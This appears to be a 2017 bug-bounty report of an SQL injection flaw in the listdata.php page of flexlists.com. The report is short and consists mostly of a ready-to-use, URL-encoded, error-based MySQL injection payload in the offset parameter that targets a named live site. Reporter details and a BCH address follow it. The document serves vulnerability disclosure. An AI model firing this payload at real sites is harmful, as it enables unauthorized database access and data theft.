The flexlist website has a bug in filtering out data passed to it when listing data , its possible to pass arbitrary SQL queries to it. URL was too long for the title so here it is: \u000D\u000A\u000D\u000A https://flexlists.com/listdata.php?list_id\u003D2424\u0026pcid\u003D\u0026query\u003D\u0026offset\u003D\u002D1 or 1\u003D1 and (SELECT 1 and ROW(1,1)\u003E(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)\u0026num_items\u003D50\u0026sort\u003D10699\u0026dir\u003DASC

https://flexlists.com/listdata.php

Screenshots

• 

Comments (0)

To comment, please sign in.

Event ID: 488

alienwithin

Total Points = 6

BCH

qr5yccf7j4dpjekyz3vpawgaarl352n7yv5d5mtzzc

No Address, will go to BLT Donation

Reported on flexlists.com

Issues Reported: 1

Browser Version: 56.0.2924

Operating System Windows

Added On

March 1, 2017, 8:32 a.m.

Bug Type

General

Submitted

Independently

OS Version:

7

Email Events:

dropped